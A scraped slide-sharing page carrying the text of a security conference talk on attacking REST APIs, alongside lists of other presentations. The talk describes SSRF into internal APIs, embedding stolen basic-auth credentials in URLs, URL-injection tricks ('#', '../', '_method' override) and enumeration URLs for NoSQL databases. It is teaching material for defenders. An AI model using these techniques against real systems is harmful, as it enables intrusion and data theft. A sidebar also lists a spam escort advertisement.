Epidemiology of Preterm BirthEpidemiology of Preterm Birth
Epidemiology of Preterm Birth
 
Ley de sustancias controladas y poder de estado
Ley de sustancias controladas y poder de estadoLey de sustancias controladas y poder de estado
Ley de sustancias controladas y poder de estado
 
Legalthings e-book
Legalthings e-bookLegalthings e-book
Legalthings e-book
 
Docencia y Public Engagement
Docencia y Public EngagementDocencia y Public Engagement
Docencia y Public Engagement
 

Similaire à Resting on your laurels will get you powned

Asec r01-resting-on-your-laurels-will-get-you-pwned
Asec r01-resting-on-your-laurels-will-get-you-pwnedAsec r01-resting-on-your-laurels-will-get-you-pwned
Asec r01-resting-on-your-laurels-will-get-you-pwnedDinis Cruz
 
Леонід Кузьмін “Сам собі паблішер. Від сайту ігрової студії до універсального...
Леонід Кузьмін “Сам собі паблішер. Від сайту ігрової студії до універсального...Леонід Кузьмін “Сам собі паблішер. Від сайту ігрової студії до універсального...
Леонід Кузьмін “Сам собі паблішер. Від сайту ігрової студії до універсального...Lviv Startup Club
 
Building APIs in an easy way using API Platform
Building APIs in an easy way using API PlatformBuilding APIs in an easy way using API Platform
Building APIs in an easy way using API PlatformAntonio Peric-Mazar
 
JAX-RS JavaOne Hyderabad, India 2011
JAX-RS JavaOne Hyderabad, India 2011JAX-RS JavaOne Hyderabad, India 2011
JAX-RS JavaOne Hyderabad, India 2011Shreedhar Ganapathy
 
RESTful web APIs (build, document, manage)
RESTful web APIs (build, document, manage)RESTful web APIs (build, document, manage)
RESTful web APIs (build, document, manage)Cisco DevNet
 
Lunacloud's Compute RESTful API - Programmer's Guide
Lunacloud's Compute RESTful API - Programmer's GuideLunacloud's Compute RESTful API - Programmer's Guide
Lunacloud's Compute RESTful API - Programmer's GuideLunacloud
 
Advanced Web Development in PHP - Understanding REST API
Advanced Web Development in PHP - Understanding REST APIAdvanced Web Development in PHP - Understanding REST API
Advanced Web Development in PHP - Understanding REST APIRasan Samarasinghe
 
Build your APIs with apigility
Build your APIs with apigilityBuild your APIs with apigility
Build your APIs with apigilityChristian Varela
 
ASP.NET Mvc 4 web api
ASP.NET Mvc 4 web apiASP.NET Mvc 4 web api
ASP.NET Mvc 4 web apiTiago Knoch
 
RESTful API-centric Universe
RESTful API-centric UniverseRESTful API-centric Universe
RESTful API-centric UniverseTihomir Opačić
 
Hia 1691-using iib-to_support_api_economy
Hia 1691-using iib-to_support_api_economyHia 1691-using iib-to_support_api_economy
Hia 1691-using iib-to_support_api_economyAndrew Coleman
 
REST API Recommendations
REST API RecommendationsREST API Recommendations
REST API RecommendationsJeelani Shaik
 
Together Cheerfully to Walk with Hypermedia
Together Cheerfully to Walk with HypermediaTogether Cheerfully to Walk with Hypermedia
Together Cheerfully to Walk with HypermediaVladimir Tsukur
 
Creating a RESTful api without losing too much sleep
Creating a RESTful api without losing too much sleepCreating a RESTful api without losing too much sleep
Creating a RESTful api without losing too much sleepMike Anderson
 
Building Your First App with MongoDB
Building Your First App with MongoDBBuilding Your First App with MongoDB
Building Your First App with MongoDBMongoDB
 
REST API and CRUD
REST API and CRUDREST API and CRUD
REST API and CRUDPrem Sanil
 
IBM Integration Bus and REST APIs - Sanjay Nagchowdhury
IBM Integration Bus and REST APIs - Sanjay NagchowdhuryIBM Integration Bus and REST APIs - Sanjay Nagchowdhury
IBM Integration Bus and REST APIs - Sanjay NagchowdhuryKaren Broughton-Mabbitt
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 

Similaire à Resting on your laurels will get you powned (20)

Asec r01-resting-on-your-laurels-will-get-you-pwned
Asec r01-resting-on-your-laurels-will-get-you-pwnedAsec r01-resting-on-your-laurels-will-get-you-pwned
Asec r01-resting-on-your-laurels-will-get-you-pwned
 
Леонід Кузьмін “Сам собі паблішер. Від сайту ігрової студії до універсального...
Леонід Кузьмін “Сам собі паблішер. Від сайту ігрової студії до універсального...Леонід Кузьмін “Сам собі паблішер. Від сайту ігрової студії до універсального...
Леонід Кузьмін “Сам собі паблішер. Від сайту ігрової студії до універсального...
 
Building APIs in an easy way using API Platform
Building APIs in an easy way using API PlatformBuilding APIs in an easy way using API Platform
Building APIs in an easy way using API Platform
 
REST APIs
REST APIsREST APIs
REST APIs
 
JAX-RS JavaOne Hyderabad, India 2011
JAX-RS JavaOne Hyderabad, India 2011JAX-RS JavaOne Hyderabad, India 2011
JAX-RS JavaOne Hyderabad, India 2011
 
RESTful web APIs (build, document, manage)
RESTful web APIs (build, document, manage)RESTful web APIs (build, document, manage)
RESTful web APIs (build, document, manage)
 
Lunacloud's Compute RESTful API - Programmer's Guide
Lunacloud's Compute RESTful API - Programmer's GuideLunacloud's Compute RESTful API - Programmer's Guide
Lunacloud's Compute RESTful API - Programmer's Guide
 
Advanced Web Development in PHP - Understanding REST API
Advanced Web Development in PHP - Understanding REST APIAdvanced Web Development in PHP - Understanding REST API
Advanced Web Development in PHP - Understanding REST API
 
Build your APIs with apigility
Build your APIs with apigilityBuild your APIs with apigility
Build your APIs with apigility
 
ASP.NET Mvc 4 web api
ASP.NET Mvc 4 web apiASP.NET Mvc 4 web api
ASP.NET Mvc 4 web api
 
RESTful API-centric Universe
RESTful API-centric UniverseRESTful API-centric Universe
RESTful API-centric Universe
 
Hia 1691-using iib-to_support_api_economy
Hia 1691-using iib-to_support_api_economyHia 1691-using iib-to_support_api_economy
Hia 1691-using iib-to_support_api_economy
 
gofortution
gofortutiongofortution
gofortution
 
REST API Recommendations
REST API RecommendationsREST API Recommendations
REST API Recommendations
 
Together Cheerfully to Walk with Hypermedia
Together Cheerfully to Walk with HypermediaTogether Cheerfully to Walk with Hypermedia
Together Cheerfully to Walk with Hypermedia
 
Creating a RESTful api without losing too much sleep
Creating a RESTful api without losing too much sleepCreating a RESTful api without losing too much sleep
Creating a RESTful api without losing too much sleep
 
Building Your First App with MongoDB
Building Your First App with MongoDBBuilding Your First App with MongoDB
Building Your First App with MongoDB
 
REST API and CRUD
REST API and CRUDREST API and CRUD
REST API and CRUD
 
IBM Integration Bus and REST APIs - Sanjay Nagchowdhury
IBM Integration Bus and REST APIs - Sanjay NagchowdhuryIBM Integration Bus and REST APIs - Sanjay Nagchowdhury
IBM Integration Bus and REST APIs - Sanjay Nagchowdhury
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 

Plus de Dinis Cruz

Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)Dinis Cruz
 
Glasswall - Safety and Integrity Through Trusted Files
Glasswall - Safety and Integrity Through Trusted FilesGlasswall - Safety and Integrity Through Trusted Files
Glasswall - Safety and Integrity Through Trusted FilesDinis Cruz
 
Glasswall - How to Prevent, Detect and React to Ransomware incidents
Glasswall - How to Prevent, Detect and React to Ransomware incidentsGlasswall - How to Prevent, Detect and React to Ransomware incidents
Glasswall - How to Prevent, Detect and React to Ransomware incidentsDinis Cruz
 
The benefits of police and industry investigation - NPCC Conference
The benefits of police and industry investigation - NPCC ConferenceThe benefits of police and industry investigation - NPCC Conference
The benefits of police and industry investigation - NPCC ConferenceDinis Cruz
 
Serverless Security Workflows - cyber talks - 19th nov 2019
Serverless Security Workflows - cyber talks - 19th nov 2019Serverless Security Workflows - cyber talks - 19th nov 2019
Serverless Security Workflows - cyber talks - 19th nov 2019Dinis Cruz
 
Modern security using graphs, automation and data science
Modern security using graphs, automation and data scienceModern security using graphs, automation and data science
Modern security using graphs, automation and data scienceDinis Cruz
 
Using Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyUsing Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyDinis Cruz
 
Dinis Cruz (CV) - CISO and Transformation Agent v1.2
Dinis Cruz (CV) - CISO and Transformation Agent v1.2Dinis Cruz (CV) - CISO and Transformation Agent v1.2
Dinis Cruz (CV) - CISO and Transformation Agent v1.2Dinis Cruz
 
Making fact based decisions and 4 board decisions (Oct 2019)
Making fact based decisions and 4 board decisions (Oct 2019)Making fact based decisions and 4 board decisions (Oct 2019)
Making fact based decisions and 4 board decisions (Oct 2019)Dinis Cruz
 
CISO Application presentation - Babylon health security
CISO Application presentation - Babylon health securityCISO Application presentation - Babylon health security
CISO Application presentation - Babylon health securityDinis Cruz
 
Using OWASP Security Bot (OSBot) to make Fact Based Security Decisions
Using OWASP Security Bot (OSBot) to make Fact Based Security DecisionsUsing OWASP Security Bot (OSBot) to make Fact Based Security Decisions
Using OWASP Security Bot (OSBot) to make Fact Based Security DecisionsDinis Cruz
 
GSBot Commands (Slack Bot used to access Jira data)
GSBot Commands (Slack Bot used to access Jira data)GSBot Commands (Slack Bot used to access Jira data)
GSBot Commands (Slack Bot used to access Jira data)Dinis Cruz
 
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6 (OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6 Dinis Cruz
 
OSBot - Data transformation workflow (from GSheet to Jupyter)
OSBot - Data transformation workflow (from GSheet to Jupyter)OSBot - Data transformation workflow (from GSheet to Jupyter)
OSBot - Data transformation workflow (from GSheet to Jupyter)Dinis Cruz
 
Jira schemas - Open Security Summit (Working Session 21th May 2019)
Jira schemas - Open Security Summit (Working Session 21th May 2019)Jira schemas - Open Security Summit (Working Session 21th May 2019)
Jira schemas - Open Security Summit (Working Session 21th May 2019)Dinis Cruz
 
Template for "Sharing anonymised risk theme dashboards v0.8"
Template for "Sharing anonymised risk theme dashboards v0.8"Template for "Sharing anonymised risk theme dashboards v0.8"
Template for "Sharing anonymised risk theme dashboards v0.8"Dinis Cruz
 
Owasp and summits (may 2019)
Owasp and summits (may 2019)Owasp and summits (may 2019)
Owasp and summits (may 2019)Dinis Cruz
 
Creating a graph based security organisation - Apr 2019 (OWASP London chapter...
Creating a graph based security organisation - Apr 2019 (OWASP London chapter...Creating a graph based security organisation - Apr 2019 (OWASP London chapter...
Creating a graph based security organisation - Apr 2019 (OWASP London chapter...Dinis Cruz
 
Open security summit 2019 owasp london 25th feb
Open security summit 2019 owasp london 25th febOpen security summit 2019 owasp london 25th feb
Open security summit 2019 owasp london 25th febDinis Cruz
 
Owasp summit 2019 - OWASP London 25th feb
Owasp summit 2019 - OWASP London 25th febOwasp summit 2019 - OWASP London 25th feb
Owasp summit 2019 - OWASP London 25th febDinis Cruz
 

Plus de Dinis Cruz (20)

Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
 
Glasswall - Safety and Integrity Through Trusted Files
Glasswall - Safety and Integrity Through Trusted FilesGlasswall - Safety and Integrity Through Trusted Files
Glasswall - Safety and Integrity Through Trusted Files
 
Glasswall - How to Prevent, Detect and React to Ransomware incidents
Glasswall - How to Prevent, Detect and React to Ransomware incidentsGlasswall - How to Prevent, Detect and React to Ransomware incidents
Glasswall - How to Prevent, Detect and React to Ransomware incidents
 
The benefits of police and industry investigation - NPCC Conference
The benefits of police and industry investigation - NPCC ConferenceThe benefits of police and industry investigation - NPCC Conference
The benefits of police and industry investigation - NPCC Conference
 
Serverless Security Workflows - cyber talks - 19th nov 2019
Serverless Security Workflows - cyber talks - 19th nov 2019Serverless Security Workflows - cyber talks - 19th nov 2019
Serverless Security Workflows - cyber talks - 19th nov 2019
 
Modern security using graphs, automation and data science
Modern security using graphs, automation and data scienceModern security using graphs, automation and data science
Modern security using graphs, automation and data science
 
Using Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyUsing Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and Strategy
 
Dinis Cruz (CV) - CISO and Transformation Agent v1.2
Dinis Cruz (CV) - CISO and Transformation Agent v1.2Dinis Cruz (CV) - CISO and Transformation Agent v1.2
Dinis Cruz (CV) - CISO and Transformation Agent v1.2
 
Making fact based decisions and 4 board decisions (Oct 2019)
Making fact based decisions and 4 board decisions (Oct 2019)Making fact based decisions and 4 board decisions (Oct 2019)
Making fact based decisions and 4 board decisions (Oct 2019)
 
CISO Application presentation - Babylon health security
CISO Application presentation - Babylon health securityCISO Application presentation - Babylon health security
CISO Application presentation - Babylon health security
 
Using OWASP Security Bot (OSBot) to make Fact Based Security Decisions
Using OWASP Security Bot (OSBot) to make Fact Based Security DecisionsUsing OWASP Security Bot (OSBot) to make Fact Based Security Decisions
Using OWASP Security Bot (OSBot) to make Fact Based Security Decisions
 
GSBot Commands (Slack Bot used to access Jira data)
GSBot Commands (Slack Bot used to access Jira data)GSBot Commands (Slack Bot used to access Jira data)
GSBot Commands (Slack Bot used to access Jira data)
 
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6 (OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6
(OLD VERSION) Dinis Cruz (CV) - CISO and Transformation Agent v0.6
 
OSBot - Data transformation workflow (from GSheet to Jupyter)
OSBot - Data transformation workflow (from GSheet to Jupyter)OSBot - Data transformation workflow (from GSheet to Jupyter)
OSBot - Data transformation workflow (from GSheet to Jupyter)
 
Jira schemas - Open Security Summit (Working Session 21th May 2019)
Jira schemas - Open Security Summit (Working Session 21th May 2019)Jira schemas - Open Security Summit (Working Session 21th May 2019)
Jira schemas - Open Security Summit (Working Session 21th May 2019)
 
Template for "Sharing anonymised risk theme dashboards v0.8"
Template for "Sharing anonymised risk theme dashboards v0.8"Template for "Sharing anonymised risk theme dashboards v0.8"
Template for "Sharing anonymised risk theme dashboards v0.8"
 
Owasp and summits (may 2019)
Owasp and summits (may 2019)Owasp and summits (may 2019)
Owasp and summits (may 2019)
 
Creating a graph based security organisation - Apr 2019 (OWASP London chapter...
Creating a graph based security organisation - Apr 2019 (OWASP London chapter...Creating a graph based security organisation - Apr 2019 (OWASP London chapter...
Creating a graph based security organisation - Apr 2019 (OWASP London chapter...
 
Open security summit 2019 owasp london 25th feb
Open security summit 2019 owasp london 25th febOpen security summit 2019 owasp london 25th feb
Open security summit 2019 owasp london 25th feb
 
Owasp summit 2019 - OWASP London 25th feb
Owasp summit 2019 - OWASP London 25th febOwasp summit 2019 - OWASP London 25th feb
Owasp summit 2019 - OWASP London 25th feb
 

Dernier

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 

Dernier (20)

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 

Resting on your laurels will get you powned

  • 1. RESTing On Your Laurels Will Get You Pwned By Abraham Kang, Dinis Cruz, and Alvaro Munoz
  • 2. Goals and Main Point • Originally a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs. • Remember that a REST API is nothing more than a web application which follows a structured set of rules. – So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection, etc. • We are going to show you how remote code execution and data filtration manifest themselves in REST APIs.
  • 3. Causes of REST Vulnerabilities • Location in the trusted network of your data center • History of REST Implementations • SSRF (Server Side Request Forgery) to Internal REST APIs • URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI) • Self describing and predicable nature • Inbred Architecture • Extensions in REST frameworks that enhance development of REST functionality at the expense of security • Incorrect assumptions of application behavior • Input types and interfaces
  • 4. REST History • Introduced to the world in a PHD dissertation by Roy Fielding in 2000. • Promoted HTTP methods (PUT, POST, GET, DELETE) and the URL itself to communicate additional metadata as to the nature of an HTTP request. Http Method Database Operation PUT Update POST Insert GET Select DELETE Delete • GET • PUT http://svr.com/customers/123 http://svr.com/customers/123
  • 5. REST History (Bad Press) • When REST originally came out, it was harshly criticized by the security community as being inherently unsafe. – As a result REST, applications were originally developed to only run on internal networks (nonpublic access). • This allowed developers to develop REST APIs in a kind of “Garden of Eden” – This also encouraged REST to become a popular interface for internal backend systems. – Once developers got comfortable with REST internal applications they are now RESTifying all publically exposed application interfaces
  • 6. Oracle AS1 FW BH1 Attacker FW Attacking Backend Systems (Trad Method) LDAP/ AD Neo4j SAP AS4 ERP AS5 … MS SQL AS2 FW FW AS3 FW BH4 Internet BH5 FW BH2 FW BH3 Internet FW Internet FW Internet FW Mongo Http Protocol (proprietary protocols are different colors) Couch Cassan EAI EII ESB HBase …
  • 7. Compromised/Pwned machine Oracle SAP MS SQL AS2 AS3 ERP Y … Non-compromised machine AS4 X LDAP/ AD Neo4j Mongo AS5 • Pwn the application server • Figure out which systems are running on the internal network and target a data rich server. (Port Scanning and Fingerprinting) • Install client protocol binaries to targeted system (in this case SAP client code) or mount network attacks directly. • Figure out the correct parameters to pass to the backend system by sniffing the network, reusing credentials, using default userids and passwords, bypassing authentication, etc. AS1 Attacking An Internal Network (Trad Method) Couch Cassan EAI EII ESB HBase …
  • 8. Non-compromised machine Y Affected machine REST API X REST API Pub REST API REST API ODATA in MS SQL Server Beehive and OAE RESTful API Neo4j, Mongo, Couch, Cassandra, HBase, your company, and many more Couch REST API – – – Mongo Cassan REST API What backend systems have a REST API that we can attack: SAP • Neo4j HBase … … • SAP REST API • Find an HTTP REST proxy w/ vulns Figure out which REST based systems are running on the internal network Exfiltrate data from the REST interface of the backend system or Get RCE on an internal REST API AS5 • • REST API Attacking An Internal Network (REST style) REST EAI EII ESB
  • 9. SSRF (Server Side Request Forgery) to Internal REST APIs • Attackers can take advantage of any server-side request forwarding or server-side request proxying mechanisms to attack internal-only REST APIs. – Examples: RFI through PHP include(), REST framework specific proxy (RESTlet Redirector), XXE, WS-* protocols, etc. • Most internal REST APIs are using basic auth over SSL. So you can use the same attacks above to find the basic auth credentials on the file system and embed them in the URL: – http://user:password@internalSvr.com/xxx...
  • 10. Internal REST API • Most publically exposed REST APIs turn around and invoke internal REST APIs using URLConnections, Apache HttpClient or other REST clients. If user input is directly concatenated into the URL used to make the backend REST request then the application could be vulnerable to Extended HPPP. Pub REST API URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI) DB
  • 11. What to Look For • new URL (“http://yourSvr.com/value” + var); • new Redirector(getContext(), urlFromCookie, MODE_SERVER_OUTBOUND ); • HttpGet(“http://yourSvr.com/value” + var); • HttpPost(“http://yourSvr.com/value” + var); • restTemplate.postForObject( ”http://localhost :8080/Rest/user/” + var, request, User.class ); • ...
  • 12. Extended HPPP (HTTP Path & Parameter Pollution) • HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola and Luca Carettoni in 2009. It utilized the discrepancy in how duplicate request parameters were processed to override application specific default values in URLs. Typically attacks utilized the “&” character to fool backend services in accepting attacker controlled request parameters. • Extended HPPP utilizes matrix and path parameters, JSON injection and path segment characters to change the underlying semantics of a REST URL request. – “#” can be used to remove ending URL characters similar to “--” in SQL Injection and “//” in JavaScript Injection – “../” can be used to change the overall semantics of the REST request in path based APIs (vs query parameter based) – “;” can be used to add matrix parameters to the URL at different path segments – The “_method” query parameter can be used to change a GET request to a PUT, DELETE, and sometimes a POST (if there is a bug in the REST API) – Special framework specific query parameters allow enhanced access to backend data through REST API. The “qt” parameter in Apache Solr – JSON Injection is also used to provide the necessary input to the application receiver.
  • 13. Extended HPPP (Apply Your Knowledge I) String entity = request.getParameter(“entity”); String id = request.getParameter(“id”); URL urlGET = new URL(“http://svr.com:5984/customers/” + entity + “?id=“ + id ); Change it to a PUT to the following URL http://svr.com:5984/admin
  • 14. REST is Self Describing and Predictable • What URL would you first try when gathering information about a REST API and the system that backs it?
  • 15. REST is Self Describing and Predictable • What URL would you first try when gathering information about a REST API and the system that backs it? – http://host:port/ • Compare this to: – Select * from all_tables (in Oracle) – sp_msforeachdb 'select "?" AS db, * from [?].sys.tables' (SQL Server) – SELECT DISTINCT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME IN ('columnA','ColumnB') AND TABLE_SCHEMA='YourDatabase'; (My SQL) – Etc.
  • 16. Especially for NoSQL REST APIs • All of the following DBs have REST APIs which closely follow their database object structures – HBase – Couch DB – Mongo DB – Cassandra.io – Neo4j
  • 17. HBase REST API • Find all the tables in the Hbase Cluster: – http://host:9000/ • Find the running HBase version: – http://host:9000/version • Find the nodes in the HBase Cluster: – http://host:9000/status/cluster • Find a description of a particular table’s schema(pick one from the prior link): – http://host:port/profile/schema
  • 18. Couch DB REST API • Find Version – http://host:5984 • Find all databases in the Couch DB: – http://host:5984/_all_dbs • Find all the documents in the Couch DB: – http://host:5984/{db_name}/_all_docs
  • 19. Neo4j REST API • Find version and extension information in the Neo4j DB: – http://host:7474/db/data/
